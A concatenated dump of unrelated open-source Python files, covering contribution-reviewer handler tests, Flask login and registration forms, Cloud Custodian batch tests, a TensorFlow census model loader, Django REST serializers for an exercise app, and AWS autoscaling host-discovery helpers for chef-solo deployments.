def test_remove_translation_reviewer_in_invalid_language_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'translator',
'removal_type': 'specific',
'review_category': 'translation',
'language_code': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid language_code: invalid')
def test_remove_unassigned_translation_reviewer_raise_error(self):
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'translator',
'removal_type': 'specific',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'translator does not have rights to review translation in language '
'hi.')
def test_remove_voiceover_reviewer(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
user_services.allow_user_to_review_voiceover_in_language(
self.voiceover_reviewer_id, 'hi')
self.assertTrue(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/removecontributionreviewerhandler', {
'username': 'voiceartist',
'removal_type': 'specific',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertFalse(user_services.can_review_voiceover_applications(
self.translation_reviewer_id, language_code='hi'))
def test_remove_voiceover_reviewer_in_invalid_language_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'voiceartist',
'removal_type': 'specific',
'review_category': 'voiceover',
'language_code': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid language_code: invalid')
def test_remove_unassigned_voiceover_reviewer_raise_error(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'voiceartist',
'removal_type': 'specific',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'voiceartist does not have rights to review voiceover in language '
'hi.')
def test_remove_question_reviewer(self):
user_services.allow_user_to_review_question(self.question_reviewer_id)
self.assertTrue(user_services.can_review_question_suggestions(
self.question_reviewer_id))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/removecontributionreviewerhandler', {
'username': 'question',
'removal_type': 'specific',
'review_category': 'question'
}, csrf_token=csrf_token)
self.assertFalse(user_services.can_review_question_suggestions(
self.question_reviewer_id))
def test_removing_unassigned_question_reviewer_raise_error(self):
self.assertFalse(user_services.can_review_question_suggestions(
self.question_reviewer_id))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'question',
'removal_type': 'specific',
'review_category': 'question'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'question does not have rights to review question.')
def test_remove_reviewer_for_invalid_review_category_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'question',
'removal_type': 'specific',
'review_category': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid review_category: invalid')
def test_remove_reviewer_for_invalid_removal_type_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'question',
'removal_type': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid removal_type: invalid')
def test_remove_reviewer_from_all_reviewable_items(self):
user_services.allow_user_to_review_question(
self.translation_reviewer_id)
self.assertTrue(user_services.can_review_question_suggestions(
self.translation_reviewer_id))
user_services.allow_user_to_review_voiceover_in_language(
self.translation_reviewer_id, 'hi')
self.assertTrue(
user_services.can_review_voiceover_applications(
self.translation_reviewer_id, language_code='hi'))
user_services.allow_user_to_review_translation_in_language(
self.translation_reviewer_id, 'hi')
self.assertTrue(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/removecontributionreviewerhandler', {
'username': 'translator',
'removal_type': 'all'
}, csrf_token=csrf_token)
self.assertFalse(user_services.can_review_question_suggestions(
self.translation_reviewer_id))
self.assertFalse(
user_services.can_review_voiceover_applications(
self.translation_reviewer_id, language_code='hi'))
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
class ContributionReviewersListHandlerTest(test_utils.GenericTestBase):
"""Tests ContributionReviewersListHandler."""
TRANSLATION_REVIEWER_EMAIL = '[email protected]'
VOICEOVER_REVIEWER_EMAIL = '[email protected]'
QUESTION_REVIEWER_EMAIL = '[email protected]'
def setUp(self):
super(ContributionReviewersListHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.TRANSLATION_REVIEWER_EMAIL, 'translator')
self.signup(self.VOICEOVER_REVIEWER_EMAIL, 'voiceartist')
self.signup(self.QUESTION_REVIEWER_EMAIL, 'question')
self.translation_reviewer_id = self.get_user_id_from_email(
self.TRANSLATION_REVIEWER_EMAIL)
self.voiceover_reviewer_id = self.get_user_id_from_email(
self.VOICEOVER_REVIEWER_EMAIL)
self.question_reviewer_id = self.get_user_id_from_email(
self.QUESTION_REVIEWER_EMAIL)
def test_check_contribution_reviewer_by_translation_reviewer_role(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
user_services.allow_user_to_review_translation_in_language(
self.translation_reviewer_id, 'hi')
user_services.allow_user_to_review_translation_in_language(
self.voiceover_reviewer_id, 'hi')
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'translation',
'language_code': 'hi'
})
self.assertEqual(len(response['usernames']), 2)
self.assertTrue('translator' in response['usernames'])
self.assertTrue('voiceartist' in response['usernames'])
def test_check_contribution_reviewer_by_voiceover_reviewer_role(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
user_services.allow_user_to_review_voiceover_in_language(
self.translation_reviewer_id, 'hi')
user_services.allow_user_to_review_voiceover_in_language(
self.voiceover_reviewer_id, 'hi')
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'voiceover',
'language_code': 'hi'
})
self.assertEqual(len(response['usernames']), 2)
self.assertTrue('translator' in response['usernames'])
self.assertTrue('voiceartist' in response['usernames'])
def test_check_contribution_reviewer_by_question_reviewer_role(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
user_services.allow_user_to_review_question(self.question_reviewer_id)
user_services.allow_user_to_review_question(self.voiceover_reviewer_id)
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'question'
})
self.assertEqual(len(response['usernames']), 2)
self.assertTrue('question' in response['usernames'])
self.assertTrue('voiceartist' in response['usernames'])
def test_check_contribution_reviewer_with_invalid_language_code_raise_error(
self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'voiceover',
'language_code': 'invalid'
}, expected_status_int=400)
self.assertEqual(response['error'], 'Invalid language_code: invalid')
self.logout()
def test_check_contribution_reviewer_with_invalid_review_category_raise_error( # pylint: disable=line-too-long
self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'invalid',
'language_code': 'hi'
}, expected_status_int=400)
self.assertEqual(response['error'], 'Invalid review_category: invalid')
self.logout()
class ContributionReviewerRightsDataHandlerTest(test_utils.GenericTestBase):
"""Tests ContributionReviewerRightsDataHandler."""
REVIEWER_EMAIL = '[email protected]'
def setUp(self):
super(ContributionReviewerRightsDataHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
def test_check_contribution_reviewer_rights(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/contributionreviewerrightsdatahandler', params={
'username': 'reviewer'
})
self.assertEqual(
response['can_review_translation_for_language_codes'], [])
self.assertEqual(
response['can_review_voiceover_for_language_codes'], [])
self.assertEqual(response['can_review_questions'], False)
user_services.allow_user_to_review_question(self.reviewer_id)
user_services.allow_user_to_review_voiceover_in_language(
self.reviewer_id, 'hi')
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
response = self.get_json(
'/contributionreviewerrightsdatahandler', params={
'username': 'reviewer'
})
self.assertEqual(
response['can_review_translation_for_language_codes'], ['hi'])
self.assertEqual(
response['can_review_voiceover_for_language_codes'], ['hi'])
self.assertEqual(response['can_review_questions'], True)
def test_check_contribution_reviewer_rights_invalid_username(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/contributionreviewerrightsdatahandler', params={
'username': 'invalid'
}, expected_status_int=400)
self.assertEqual(response['error'], 'Invalid username: invalid')
self.logout()
def test_check_contribution_reviewer_rights_without_username(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/contributionreviewerrightsdatahandler', params={},
expected_status_int=400)
self.assertEqual(response['error'], 'Missing username param')
self.logout()
| apache-2.0 | -4,891,581,027,496,295,000 | 38.854401 | 114 | 0.606186 | false |
Tust-Celitea/celitea_portal_ng | app/auth/forms.py | 1 | 3777 | import flask_wtf
import wtforms
from wtforms.validators import DataRequired, Length, Email, Regexp, EqualTo
from ..models import User
class LoginForm(flask_wtf.FlaskForm):
email = wtforms.StringField('电子邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
password = wtforms.PasswordField('密码', validators=[DataRequired()])
remember_me = wtforms.BooleanField('在本次会话中保存登录状态')
submit = wtforms.SubmitField('登录')
class RegistrationForm(flask_wtf.FlaskForm):
email = wtforms.StringField('电子邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
username = wtforms.StringField('用户名', validators=[
DataRequired(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
' (╯・∧・)╯ ┻━┻ 用户名只能包含字母,数字和下划线。 ')])
password = wtforms.PasswordField('密码', validators=[
DataRequired(), EqualTo('password2', message='(╯=﹁"﹁=)╯ ┻━┻ 两次输入的密码不一样')])
password2 = wtforms.PasswordField('重复密码', validators=[DataRequired()])
submit = wtforms.SubmitField('注册')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise wtforms.ValidationError('(ノ`Д´)ノ┻━┻ 这个邮箱注册过啦~<br />或许汝需要试试 <a href="/auth/login">登录</a>?')
def validate_username(self, field):
if User.query.filter_by(username=field.data).first():
raise wtforms.ValidationError('(ノ`Д´)ノ┻━┻ 这个用户名注册过啦~')
class ChangePasswordForm(flask_wtf.FlaskForm):
old_password = wtforms.PasswordField('旧密码', validators=[DataRequired()])
password = wtforms.PasswordField('新密码', validators=[
DataRequired(), EqualTo('password2', message='(╯=﹁"﹁=)╯ ┻━┻ 两次输入的密码不一样')])
password2 = wtforms.PasswordField('重复一遍新密码', validators=[DataRequired()])
submit = wtforms.SubmitField('更改密码 | ω・`)')
class PasswordResetRequestForm(flask_wtf.FlaskForm):
email = wtforms.StringField('邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
submit = wtforms.SubmitField('发送密码重置邮件,Biu~')
class PasswordResetForm(flask_wtf.FlaskForm):
email = wtforms.StringField('邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
password = wtforms.PasswordField('新密码', validators=[
DataRequired(), EqualTo('password2', message='(╯=﹁"﹁=)╯ ┻━┻ 两次输入的密码不一样')])
password2 = wtforms.PasswordField('重复一遍新密码', validators=[DataRequired()])
submit = wtforms.SubmitField('更改密码 | ω・`)')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first() is None:
raise wtforms.ValidationError('咦?这个邮件地址咱好像不认识 😂 ')
class ChangeEmailForm(flask_wtf.FlaskForm):
email = wtforms.StringField('新的邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
password = wtforms.PasswordField('密码', validators=[DataRequired()])
submit = wtforms.SubmitField('更改邮件地址| ω・`)')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise wtforms.ValidationError('(ノ`Д´)ノ┻━┻ 这个邮箱注册过啦~')
| gpl-3.0 | -548,536,487,658,854,460 | 45.814286 | 108 | 0.611535 | false |
capitalone/cloud-custodian | tests/test_batch.py | 1 | 2707 | # Copyright 2018 Capital One Services, LLC
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from .common import BaseTest
class TestBatchComputeEnvironment(BaseTest):
def test_batch_compute_update(self):
session_factory = self.replay_flight_data("test_batch_compute_update")
p = self.load_policy(
{
"name": "batch-compute",
"resource": "batch-compute",
"filters": [{"computeResources.desiredvCpus": 0}, {"state": "ENABLED"}],
"actions": [{"type": "update-environment", "state": "DISABLED"}],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
client = session_factory().client("batch")
envs = client.describe_compute_environments(
computeEnvironments=[resources[0]["computeEnvironmentName"]]
)[
"computeEnvironments"
]
self.assertEqual(envs[0]["state"], "DISABLED")
def test_batch_compute_delete(self):
session_factory = self.replay_flight_data("test_batch_compute_delete")
p = self.load_policy(
{
"name": "batch-compute",
"resource": "batch-compute",
"filters": [{"computeResources.desiredvCpus": 0}],
"actions": [{"type": "delete"}],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
client = session_factory().client("batch")
envs = client.describe_compute_environments(
computeEnvironments=[resources[0]['computeEnvironmentName']]
)['computeEnvironments']
self.assertEqual(envs[0]['status'], 'DELETING')
class TestBatchDefinition(BaseTest):
def test_definition_deregister(self):
def_name = 'c7n_batch'
session_factory = self.replay_flight_data(
'test_batch_definition_deregister')
p = self.load_policy({
'name': 'batch-definition',
'resource': 'batch-definition',
'filters': [
{'containerProperties.image': 'amazonlinux'}],
'actions': [{'type': 'deregister'}]
}, session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]['jobDefinitionName'], 'c7n_batch')
client = session_factory(region='us-east-1').client('batch')
defs = client.describe_job_definitions(
jobDefinitionName=def_name)['jobDefinitions']
self.assertEqual(defs[0]['status'], 'INACTIVE')
| apache-2.0 | 7,499,708,579,604,423,000 | 38.231884 | 88 | 0.58478 | false |
HaprianVlad/TensorFlowProjects | LinearModels/dataHandler.py | 1 | 5358 | import tempfile
import urllib.request
import pandas as pd
import os
import tensorflow as tf
# DATA LABELS
LABEL_COLUMN = "label"
CATEGORICAL_COLUMNS = ["workclass", "education", "marital_status", "occupation",
"relationship", "race", "gender", "native_country"]
CONTINUOUS_COLUMNS = ["age", "education_num", "capital_gain", "capital_loss", "hours_per_week"]
COLUMNS = ["age", "workclass", "fnlwgt", "education", "education_num",
"marital_status", "occupation", "relationship", "race", "gender",
"capital_gain", "capital_loss", "hours_per_week", "native_country",
"income_bracket"]
def read_data():
print("Data is loading ...")
data_dir = "data"
train_file_name = data_dir + "/train_file.dat"
test_file_name = data_dir + "/test_file.dat"
if not os.path.exists(data_dir):
os.makedirs(data_dir)
if os.path.exists(train_file_name):
train_file = open(train_file_name, "r")
else:
train_file = open(train_file_name, "w+")
urllib.request.urlretrieve("https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data", train_file.name)
if os.path.exists(test_file_name):
test_file = open(test_file_name, "r")
else:
test_file = open(test_file_name, "w+")
urllib.request.urlretrieve("https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data", test_file.name)
df_train = pd.read_csv(train_file, names=COLUMNS, skipinitialspace=True)
df_test = pd.read_csv(test_file, names=COLUMNS, skipinitialspace=True, skiprows=1)
df_train[LABEL_COLUMN] = (df_train["income_bracket"].apply(lambda x: ">50K" in x)).astype(int)
df_test[LABEL_COLUMN] = (df_test["income_bracket"].apply(lambda x: ">50K" in x)).astype(int)
print("Data loading done!")
train_file.close();
test_file.close();
return [df_train, df_test]
# CREATE A TENSOR MODEL. This is represented as a dictionary: feature_name -> feature_tensor
def input_fn(df):
# Creates a dictionary mapping from each continuous feature column name (k) to
# the values of that column stored in a constant Tensor.
continuous_cols = {k: tf.constant(df[k].values) for k in CONTINUOUS_COLUMNS}
# Creates a dictionary mapping from each categorical feature column name (k)
# to the values of that column stored in a tf.SparseTensor.
categorical_cols = {k: tf.SparseTensor(
indices=[[i, 0] for i in range(df[k].size)],
values=df[k].values,
shape=[df[k].size, 1])
for k in CATEGORICAL_COLUMNS
}
# Merges the two dictionaries into one.
feature_cols = dict(continuous_cols)
feature_cols.update(categorical_cols.items())
# Converts the label column into a constant Tensor.
label = tf.constant(df[LABEL_COLUMN].values)
# Returns the feature columns (data matrix X) and the label(y) all represented as tensors.
return feature_cols, label
def train_input_fn(df_train):
return input_fn(df_train)
def eval_input_fn(df_test):
return input_fn(df_test)
# DEFINES THE TRANSFORMATIONS EACH FEATURE_TENSOR WILL SUPPORT.
def feature_transformations():
## CATEGORICAL FEATURES
gender = tf.contrib.layers.sparse_column_with_keys(column_name="gender", keys=["Female", "Male"])
race = tf.contrib.layers.sparse_column_with_keys(column_name="race", keys=["White", "Black"])
education = tf.contrib.layers.sparse_column_with_hash_bucket("education", hash_bucket_size=1000)
relationship = tf.contrib.layers.sparse_column_with_hash_bucket("relationship", hash_bucket_size=100)
workclass = tf.contrib.layers.sparse_column_with_hash_bucket("workclass", hash_bucket_size=100)
occupation = tf.contrib.layers.sparse_column_with_hash_bucket("occupation", hash_bucket_size=1000)
native_country = tf.contrib.layers.sparse_column_with_hash_bucket("native_country", hash_bucket_size=1000)
## CONTINUOS FEATURES
age = tf.contrib.layers.real_valued_column("age")
education_num = tf.contrib.layers.real_valued_column("education_num")
capital_gain = tf.contrib.layers.real_valued_column("capital_gain")
capital_loss = tf.contrib.layers.real_valued_column("capital_loss")
hours_per_week = tf.contrib.layers.real_valued_column("hours_per_week")
## TRANSFORMATIONS
### BUCKETIZATION OF CONTINOUS FEATURES
age_buckets = tf.contrib.layers.bucketized_column(age, boundaries=[18, 25, 30, 35, 40, 45, 50, 55, 60, 65])
## DIFFERENT FEATURE SETS
wide_columns = [gender, native_country, education, occupation, workclass,
relationship, age_buckets,
tf.contrib.layers.crossed_column([education, occupation],
hash_bucket_size=int(1e4)),
tf.contrib.layers.crossed_column(
[age_buckets, education, occupation],
hash_bucket_size=int(1e6)),
tf.contrib.layers.crossed_column([native_country, occupation],
hash_bucket_size=int(1e4))]
deep_columns = [
tf.contrib.layers.embedding_column(workclass, dimension=8),
tf.contrib.layers.embedding_column(education, dimension=8),
tf.contrib.layers.embedding_column(gender, dimension=8),
tf.contrib.layers.embedding_column(relationship, dimension=8),
tf.contrib.layers.embedding_column(native_country,
dimension=8),
tf.contrib.layers.embedding_column(occupation, dimension=8),
age,
education_num,
capital_gain,
capital_loss,
hours_per_week]
return [wide_columns, deep_columns]
| apache-2.0 | 1,279,183,477,228,595,000 | 35.44898 | 123 | 0.703434 | false |
wger-project/wger | wger/exercises/api/serializers.py | 1 | 4625 | # -*- coding: utf-8 -*-
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# Third Party
from rest_framework import serializers
# wger
from wger.exercises.models import (
Equipment,
Exercise,
ExerciseBase,
ExerciseCategory,
ExerciseComment,
ExerciseImage,
Muscle,
)
class ExerciseBaseSerializer(serializers.ModelSerializer):
"""
Exercise serializer
"""
class Meta:
model = ExerciseBase
fields = [
'id',
'uuid',
'category',
'muscles',
'muscles_secondary',
'equipment',
'creation_date',
]
class EquipmentSerializer(serializers.ModelSerializer):
"""
Equipment serializer
"""
class Meta:
model = Equipment
fields = [
'id',
'name',
]
class ExerciseImageSerializer(serializers.ModelSerializer):
"""
ExerciseImage serializer
"""
class Meta:
model = ExerciseImage
fields = [
'id',
'uuid',
'exercise_base',
'image',
'is_main',
'status',
]
class ExerciseCommentSerializer(serializers.ModelSerializer):
"""
ExerciseComment serializer
"""
class Meta:
model = ExerciseComment
fields = [
'id',
'exercise',
'comment',
]
class ExerciseCategorySerializer(serializers.ModelSerializer):
"""
ExerciseCategory serializer
"""
class Meta:
model = ExerciseCategory
fields = ['id', 'name']
class MuscleSerializer(serializers.ModelSerializer):
"""
Muscle serializer
"""
class Meta:
model = Muscle
fields = [
'id',
'name',
'is_front',
'image_url_main',
'image_url_secondary',
]
class ExerciseSerializer(serializers.ModelSerializer):
"""
Exercise serializer
The fields from the new ExerciseBase are retrieved here as to retain
compatibility with the old model where all the fields where in Exercise.
"""
category = serializers.PrimaryKeyRelatedField(read_only=True)
muscles = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
muscles_secondary = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
equipment = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
variations = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
class Meta:
model = Exercise
fields = (
"id",
"uuid",
"name",
"exercise_base",
"status",
"description",
"creation_date",
"category",
"muscles",
"muscles_secondary",
"equipment",
"language",
"license",
"license_author",
"variations",
)
class ExerciseInfoSerializer(serializers.ModelSerializer):
"""
Exercise info serializer
"""
images = ExerciseImageSerializer(many=True, read_only=True)
comments = ExerciseCommentSerializer(source='exercisecomment_set', many=True, read_only=True)
category = ExerciseCategorySerializer(read_only=True)
muscles = MuscleSerializer(many=True, read_only=True)
muscles_secondary = MuscleSerializer(many=True, read_only=True)
equipment = EquipmentSerializer(many=True, read_only=True)
variations = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
class Meta:
model = Exercise
depth = 1
fields = [
"id",
"name",
"uuid",
"description",
"creation_date",
"category",
"muscles",
"muscles_secondary",
"equipment",
"language",
"license",
"license_author",
"images",
"comments",
"variations",
]
| agpl-3.0 | 7,936,270,238,942,832,000 | 23.865591 | 97 | 0.588541 | false |
mk45/road_project | dialog.py | 1 | 1349 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2015 Maciej Kamiński ([email protected]) Politechnika Wrocławska
#
# This source is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This code is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
###############################################################################
__author__ = 'Maciej Kamiński Politechnika Wrocławska'
import os
from PyQt4 import QtGui, uic
FORM_CLASS, _ = uic.loadUiType(os.path.join(
os.path.dirname(__file__), 'dialog.ui'))
class Dialog(QtGui.QDialog, FORM_CLASS):
def __init__(self, parent=None):
"""Constructor."""
super(Dialog, self).__init__(parent)
self.setupUi(self)
| gpl-2.0 | 8,945,893,947,594,751,000 | 37.428571 | 88 | 0.635688 | false |
josegonzalez/chef-solo-cup | chef_solo_cup/helpers.py | 1 | 15230 | # -*- coding: utf-8 -*-
from __future__ import with_statement
import base64
import collections
import itertools
import json
import os
import re
import sys
import unidecode
import urllib2
from boto.ec2 import connect_to_region
from boto.exception import EC2ResponseError
import boto.ec2.autoscale
from fabric.api import run, sudo
from fabric.contrib.project import rsync_project
from chef_solo_cup.log import setup_custom_logger
def get_hosts(args, logger=None):
dna_path = os.path.join(os.path.realpath(os.getcwd()), 'dna')
includes = []
if args['dna_patterns']:
includes = map(lambda x: re.compile(x, re.I), args['dna_patterns'])
excludes = []
if args['exclude']:
excludes = map(lambda x: re.compile(x, re.I), args['exclude'])
all_hosts = itertools.chain(
get_filesystem_hosts(args, dna_path, logger=logger),
get_asg_hosts(args, dna_path, logger=logger),
)
hosts = _collect_valid_hosts(
all_hosts,
excludes,
includes,
args,
logger=logger
)
hosts = filter_hosts(args, hosts, logger=logger)
hosts = collections.OrderedDict(sorted(hosts.items()))
if args['quantity'] is not None:
x = itertools.islice(hosts.items(), 0, int(args['quantity']))
hosts = {}
for key, value in x:
hosts[key] = value
hosts = collections.OrderedDict(sorted(hosts.items()))
return hosts
def _collect_valid_hosts(all_hosts, excludes, includes, args, logger=None):
hosts = {}
for host, data in all_hosts:
if _skip_host(data, excludes, includes, args, logger=logger):
continue
if 'public_ip' in data and not data['public_ip']:
del data['public_ip']
if 'private_ip' in data and not data['private_ip']:
del data['private_ip']
data['host'] = host
valid_hosts = [data.get('public_ip'), data.get('private_ip'), host]
for hostname in valid_hosts:
if hostname:
data['host'] = hostname
break
hosts[host] = data
return hosts
def _skip_host(data, excludes, includes, args, logger=None):
f = data.get('file', '')
for key, value in _resolve_tags(args).iteritems():
if value != data.get('tags', {}).get(key, None):
logger.debug('Skipping {0} because tags dont match'.format(f))
return True
if len(excludes):
skip = map(lambda regex: regex.search(f), excludes)
skip = reduce(lambda x, y: x or y, skip)
if skip:
logger.debug('Skipping {0} because exclusion rule'.format(f))
return True
if len(includes):
skip = map(lambda regex: regex.search(f), includes)
skip = reduce(lambda x, y: x or y, skip)
if skip is None:
logger.debug('Skipping {0} because inclusion rule'.format(f))
return True
if args['regions'] and data.get('region') not in args['regions']:
logger.debug('Skipping {0} because regions dont match'.format(f))
return True
if args['providers'] and data.get('provider') not in args['providers']:
logger.debug('Skipping {0} because providers dont match'.format(f))
return True
if args['services'] and data.get('service') not in args['services']:
logger.debug('Skipping {0} because services dont match'.format(f))
return True
return False
def _resolve_tags(args):
if not args.get('tags', None):
return {}
tags = {}
for tag in args.get('tags', {}):
key, value = tag.split('=')
tags[key] = value
return tags
def get_filesystem_hosts(args, dna_path, logger=None):
for root, sub_folders, files in os.walk(dna_path):
files = filter(lambda f: ".json" in f, files)
for f in files:
path = root.split("/")
region = path.pop()
provider = path.pop()
service = path.pop()
host = f.replace(".json", "")
if host in ["all", "default"]:
continue
yield host, {
'file': f,
'path': os.path.join(root, f),
'root': root,
'region': region,
'provider': provider,
'service': service,
'tags': {},
'dna_path': "dna/{0}/{1}/{2}/{3}".format(
service,
provider,
region,
f
)
}
def get_asg_hosts(args, dna_path, logger=None):
if not args['regions']:
return
if not args['aws_access_key_id'] or not args['aws_secret_access_key']:
return
cwd = os.path.realpath(os.getcwd())
asg_path = os.path.join(cwd, args['asg_dna_path'])
asg_dna_files = []
for f in os.listdir(asg_path):
if os.path.isfile(os.path.join(asg_path, f)):
asg_dna_files.append(f)
response = _get_api_response(args, region=None, logger=logger)
if response:
for region in args['regions']:
groups = _group_from_region(response, region)
for group, instances in groups.items():
group_name = group.strip()
if args['use_alternate_databag']:
group_dna_file = _get_group_dna_file(
args['use_alternate_databag'],
asg_dna_files)
else:
group_dna_file = _get_group_dna_file(
group_name,
asg_dna_files)
logger.debug('== [group:{0}] [use_alternate_databag:{1}] [databag:{2}]'.format(
group,
args['use_alternate_databag'],
group_dna_file))
for name, instance in instances.items():
yield name, {
'file': slugify(name.strip()),
'region': region,
'provider': 'AWS',
'private_ip': instance['private_ip_address'],
'public_ip': instance['ip_address'],
'group_name': instance['tags']['aws:autoscaling:groupName'], # noqa
'tags': instance['tags'],
'dna_path': os.path.join(
args['asg_dna_path'],
dna_file_name_from_tags(
args,
group_dna_file.strip(),
instance['tags'])
),
}
else:
for region in args['regions']:
auto_scale_conn = _connection_autoscale(args, region)
conn = _connection_ec2(args, region)
for group in auto_scale_conn.get_all_groups():
instance_ids = [i.instance_id for i in group.instances]
if not instance_ids:
continue
try:
reservations = conn.get_all_instances(instance_ids)
except EC2ResponseError:
continue
group_name = group.name.strip()
if args['use_alternate_databag']:
group_dna_file = _get_group_dna_file(
args['use_alternate_databag'],
asg_dna_files)
else:
group_dna_file = _get_group_dna_file(
group_name,
asg_dna_files)
instances = [i for r in reservations for i in r.instances]
for instance in instances:
name = '{0}-{1}'.format(group_name, instance.id)
yield name, {
'file': slugify(name.strip()),
'region': region,
'provider': 'AWS',
'public_ip': instance.ip_address,
'private_ip': instance['private_ip_address'],
'group_name': instance['tags']['aws:autoscaling:groupName'], # noqa
'tags': instance['tags'],
'dna_path': os.path.join(
args['asg_dna_path'],
dna_file_name_from_tags(
args,
group_dna_file.strip(),
instance['tags'])
),
}
def _group_from_region(response, region):
groups = {}
for group, instances in response.items():
in_region = False
for name, instance in instances.items():
in_region = instance['region'] == region
break
if not in_region:
continue
groups[group] = {}
for name, instance in instances.items():
groups[group][name] = instance
return groups
def _connection_autoscale(args, region):
return boto.ec2.autoscale.connect_to_region(
region,
aws_access_key_id=args['aws_access_key_id'],
aws_secret_access_key=args['aws_secret_access_key'],
)
def _connection_ec2(args, region):
return connect_to_region(
region,
aws_access_key_id=args['aws_access_key_id'],
aws_secret_access_key=args['aws_secret_access_key'],
)
